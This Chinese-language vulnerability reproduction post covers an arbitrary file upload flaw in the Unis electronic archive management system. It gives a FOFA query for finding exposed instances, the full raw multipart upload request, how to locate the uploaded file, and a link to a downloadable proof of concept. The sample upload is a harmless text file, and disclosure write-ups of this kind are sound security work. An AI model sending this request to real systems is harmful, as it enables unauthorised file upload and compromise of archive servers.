免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
1. 紫光档案管理系统简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
紫光电子档案管理系统是一款专业的电子档案管理软件,旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能,能够提供全面的档案管理解决方案。
2.漏洞描述
紫光电子档案管理系统是一款专业的电子档案管理软件,旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能,能够提供全面的档案管理解决方案。同时,紫光电子档案管理系统还拥有智能化的分类和归档功能,可以自动识别文件类型和属性,实现快速分类和高效管理。用户只需简单操作,就能轻松实现对各类电子档案的整理、查询和备份,极大提升了工作效率和信息安全性。该系统存在任意文件上传漏洞。
CVE 编号:
CNNVD 编号:
CNVD 编号:
3.影响版本
紫光电子档案管理系统
4.fofa 查询语句
app="紫光档案管理系统"
5.漏洞复现
漏洞链接:http://127.0.0.1/System/Cms/upload.html?token=
漏洞数据包:
POST/System/Cms/upload.html?token=HTTP/1.1Host:127.0.0.1User-Agent:Mozilla/4.0(compatible;MSIE8.0;WindowsNT6.1)Accept-Encoding:gzip,deflateAccept:*/*Connection: closeContent-Length: 512Content-Type: multipart/form-data; boundary=c8fe659c69f6f5f6a7edaf5e1cca5d34
--c8fe659c69f6f5f6a7edaf5e1cca5d34
Content-Disposition: form-data; name="files[]"; filename="16360.txt"
578321995
--c8fe659c69f6f5f6a7edaf5e1cca5d34
Content-Disposition: form-data; name="userID"
admin
--c8fe659c69f6f5f6a7edaf5e1cca5d34
Content-Disposition: form-data; name="fondsid"
1
--c8fe659c69f6f5f6a7edaf5e1cca5d34
Content-Disposition: form-data; name="comid"
1
--c8fe659c69f6f5f6a7edaf5e1cca5d34
Content-Disposition: form-data; name="token"
1
--c8fe659c69f6f5f6a7edaf5e1cca5d34--
上传成功后,会显示出上传的路径和文件名
根据返回包拼接上传的地址:http://127.0.0.1/uploads/company1/fonds1/cms/20231020/UNIS-Htb4kI2loiU7699AJOe757dAz.txt
6.POC&EXP
链接:https://pan.baidu.com/s/15LqfMoSqgRbGtMryvHyfYw?pwd=nrj9 提取码:nrj9
原文始发于微信公众号(南风漏洞复现文库):紫光档案管理系统存在任意文件上传 附 POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论